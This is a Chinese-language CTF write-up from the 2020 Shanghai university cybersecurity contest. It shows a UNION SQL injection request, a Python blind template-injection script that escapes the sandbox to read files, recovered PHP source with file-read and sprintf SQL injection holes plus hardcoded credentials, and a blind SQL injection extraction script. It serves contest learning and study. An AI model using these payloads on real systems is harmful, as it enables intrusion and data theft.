2020上海市大学生网络安全大赛部分wp

2020上海市大学生网络安全大赛部分wp

千毒网盘

这题很迷,开始时候扫了一次,没有扫出来www.zip,后来就扫出来了

image-20201114193038409

有一个变量覆盖点，过滤了 ' 、union 等关键字。大致思路是：先通过第一个循环把 $_POST['code'] 置为 NULL，从而通过 filter() 的过滤；然后利用 extract($_GET,EXTR_SKIP); 给 $_POST['code'] 重新赋值，带入注入；之后就是常规的联合注入了。

POST /index.php?_POST[code]=114514'%20and%200%20union%20select%20user(),1,flag/**/from/**/flag%23 HTTP/1.1
Host: eci-2zehpt4jc1z3lyl83iz5.cloudeci1.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=1755a6e9ee915c-054346254fd387-303464-168000-1755a6e9eeaab8; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O;_POST[code]=1145
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

code=1145

image-20201114193454149

Hello

读完源码可知,404页面有SSTI,fuzz读文件,这里可以通过/proc/self/fd/3读到删除的文件

然后用脚本盲注

# -*- coding: utf-8 -*-
import requests


# Endpoint that renders the injected template; each POST below is answered
# with a body that contains "1" only when the probed condition holds.
url = 'http://eci-2zegdefmmywv7mh25iet.cloudeci1.ichunqiu.com:8888/eee'

def check(payload):
    """Return True when the server's response body contains the character '1'.

    ``payload`` is sent unchanged as the POST body with a JSON content type
    (it is not actually JSON-encoded).  Reads the module-level ``url``.
    NOTE: ``.content`` is bytes; the ``'1' in ...`` membership test only works
    on Python 2 (the script also uses ``xrange``).
    """
    response = requests.post(
        url,
        data=payload,
        headers={'Content-Type': 'application/json'},
    )
    return '1' in response.content

password = ''
# Candidate alphabet tried at every position of the recovered file contents.
s = r'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}-%'

# Character-by-character extraction through the template injection on the
# 404 page: each probe is a template conditional that reads /proc/self/fd/3
# (the deleted file still held open by the server process, per the notes
# above) and renders "1" only when the character at position i equals the
# candidate.  The object traversal (__class__ -> __base__ ->
# __subclasses__()[75] -> __globals__ -> __builtins__) is exactly what a
# sandboxed template environment is meant to block.
for i in xrange(0, 100):  # Python 2 script (xrange)
    for c in s:
        payload = ''.join([
            '{% if ().__class__.__base__.__subclasses__()[75].__init__.__globals__.__builtins__[\'open\'](\'/proc/self/fd/3\').read()[',
            str(i),
            ':',
            str(i + 1),
            '] == "',
            c,
            '" %}1{% endif %}',
        ])
        if check(payload):
            password += c
            print(password)
            break  # next position; a position with no match is simply skipped
print(password)

image-20201114194157205

TryToLogin

读配置文件

image-20201114194615848

得到网站根目录,读文件

//index.php
<?php
// index.php (challenge source as recovered by the write-up).
// Two handlers: an unauthenticated file reader driven by ?file=, and a
// login form handled by user::login() from class.php.
include 'class.php';

if(isset($_GET['file'])){
    // Arbitrary file read rooted at "/": the only restriction is that the
    // requested path must not contain "flag" (case-insensitive, /i).  Any
    // other absolute path -- including the application's own sources -- is
    // returned verbatim.  The strict === 0 also refuses the read when
    // preg_match() fails (returns false) rather than reporting 0 matches.
    if(preg_match('/flag/is', $_GET['file']) === 0){
        echo file_get_contents('/'.$_GET['file']);
    }
}

if(isset($_POST['password'])){
    // user::__construct() opens the DB connection; login() runs the query
    // and returns 1 when the fetched row has a truthy id, otherwise 0.
    $user = new user;
    $login = $user->login();
    if($login){
        // Success banner (markup and text emitted as-is).
        echo <<<EOF
<br>
<div class="container">
<div class="row clearfix">
<div class="col-md-12 column">
<div class="alert alert-dismissable alert-info">
<button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
<h4>
恭喜!
</h4> <strong>Success!</strong>登录成功了!
</div>
</div>
</div>
</div>
EOF;
    }else{
        // Failure banner; the trailing HTML comment hints at the ?file= reader.
        echo <<<EOF
<br>
<div class="container">
<div class="row clearfix">
<div class="col-md-12 column">
<div class="alert alert-dismissable alert-danger">
<button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
<h4>
注意!
</h4> <strong>Wrong!</strong>用户名或密码错误!Need help?
</div>
</div>
</div>
</div>

<!-- /?file=xxx 请使用绝对路径-->
EOF;
    }

}
?>
//class.php
<?php
/**
 * Login helper used by index.php.
 *
 * Holds the database credentials as public properties, opens the connection
 * in the constructor, and authenticates the POSTed username/password in
 * login() after a light keyword filter.
 */
class user
{
    // Hard-coded connection parameters.  Because index.php serves arbitrary
    // files, anyone who fetches class.php through ?file= can read them.
    public $hostname = '127.0.0.1';
    public $username = 'root';
    public $password = 'qwertyu';
    public $database = 'test';
    private $mysqli = null;   // set in __construct()

    /**
     * Connects to MySQL with the properties above and selects $database.
     * No error handling: a failed connect is not detected here.
     */
    public function __construct()
    {
        $this->mysqli = mysqli_connect(
            $this->hostname,
            $this->username,
            $this->password
        );
        mysqli_select_db($this->mysqli,$this->database);
    }

    /**
     * Input filter applied to $_POST['username'] / $_POST['password'].
     *
     * addslashes() escapes quotes and backslashes in both fields, then any
     * occurrence of "inn" or "or" (case-insensitive) in either field stops
     * the script with "No hacker!".  Returns true when both fields pass.
     * Note the substring match: "or" also rejects words such as "order",
     * "information_schema" and "password", while e.g. "union" passes.
     */
    public function filter()
    {
        $_POST['username'] = addslashes($_POST['username']);
        $_POST['password'] = addslashes($_POST['password']);
        $safe1 = preg_match('/inn|or/is', $_POST['username']);
        $safe2 = preg_match('/inn|or/is', $_POST['password']);
        if($safe1 === 0 and $safe2 === 0){
            return true;
        }else{
            die('No hacker!');
        }
    }

    /**
     * Authenticates with the filtered $_POST fields.
     *
     * The query is assembled in two steps: (1) $password is interpolated
     * directly into the format string, (2) sprintf() then substitutes
     * $username for %s.  Because the password is already part of the format
     * string when sprintf() runs, printf directives inside the password are
     * interpreted too -- this is the escape the write-up relies on (the
     * addslashes() quoting happens before sprintf() sees the string; confirm
     * the exact formatter behaviour against the PHP version in use).
     * print_r($sql) echoes the final query into the response body.
     *
     * Returns 1 when the first fetched row has a truthy id, otherwise 0.
     * A failed mysqli_query() (false) is passed straight to
     * mysqli_fetch_object() without handling.
     */
    public function login()
    {
        $this->filter();
        $username = $_POST['username'];
        $password = $_POST['password'];
        $sql = "select * from user where username='%s' and password='$password'";
        $sql = sprintf($sql,$username);
        print_r($sql);
        $result = mysqli_query($this->mysqli,$sql);
        $result = mysqli_fetch_object($result);
        if($result->id){
            return 1;
        }else{
            return 0;
        }

    }

}

// Runs whenever class.php is included (index.php includes it unconditionally),
// so every request starts a session.
session_start();

读文件可得：SQL 注入处使用了 sprintf 格式化，借此逃逸单引号，bypass 对 or 的过滤，然后无列名注入，得到 flag。

# encoding=utf-8
import requests
import time

# Target login endpoint (index.php -> user::login()); see the recovered PHP
# source above for how the query is built.
url="http://eci-2zejdvvwkqa12mptvclx.cloudeci1.ichunqiu.com/index.php"
# Every request goes through a local interception proxy on 8080 so each probe
# can be inspected; remove the dict to send directly.
proxies = {
    "http": "http://127.0.0.1:8080",
}
flag=""

#erfenfa  ("二分法": binary search on the ASCII code of each character)
# Boolean-based blind extraction, positions 1..49.  The page shows "Success!"
# only when the login query returns a row, and the injected condition makes
# that equivalent to "ascii(character i) > mid".
for i in range(1,50):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload=r"id=\\0&path=or 1=(ascii(mid(CONCAT_WS(CHAR(32,58,32),user(),database(),version()),{},1))>{})--+" #65
        #payload=r"id=\\0&path=or 1=(ascii(mid((select/**/group_concat(column_NAME)/**/from/**/information_schema.columnS/**/where/**/table_schema=database()),{},1))>{})--+"
        # The next three assignments are dead -- each is overwritten by the one
        # after it and only the last `payload=` is sent.  Left as the author
        # wrote them.
        payload=r"type=2&imei=\" and if((ascii(mid((select password from users limit 1 offset 0),{},1))>{}),benchmark(1000000,sha(1)),0)#"
        payload="type=2&imei=\" and if((ascii(mid((user()),{},1))>{}),benchmark(1000000,sha(1)),0)#"
        payload="(ascii(mid((select/**/group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))>{})"
        # Effective probe: `select 1 union select * from fl4g` gives the table
        # a column named "1", and `limit 1,1` picks the second row (the real
        # fl4g row), so the value is read without knowing the column name
        # ("无列名注入").
        payload="(ascii(mid((select x.1 from(select 1 union select * from fl4g)x limit 1,1),{},1))>{})"
        #payload="(ascii(mid((select username ),{},1))>{})"
        url_1=url
        # The password field starts with "%1$'": per the write-up, the
        # server-side sprintf() consumes that prefix so the quote that
        # addslashes() escaped ends up closing the string literal -- confirm
        # against class.php.  "||" stands in for "or", which filter()
        # rejects; "#" comments out the rest of the query.
        data = {"username":"admin","password":"%1$' || "+payload.format(i,mid)+"#"}
        r=requests.post(url_1,data=data,proxies=proxies)
        #print(r.content)
        if "Success!" in r.text:
            # condition true -> the character's code is above mid
            low=mid+1
        else:
            high=mid
        mid=(low+high)//2
    # loop exits with low == high == mid: the recovered code point
    flag+=chr(mid)
    print(flag)
#(select x.2 from(select 1,2,3 union select * from user)x)

image-20201114195244441

pcap

用wireshark打开,筛选出DNP3.0协议,追踪流发现规律

image-20201114194124842

然后写脚本跑

image-20201114194347238

pcap analysis

和上题一样

image-20201114194531922

直接手敲。。。。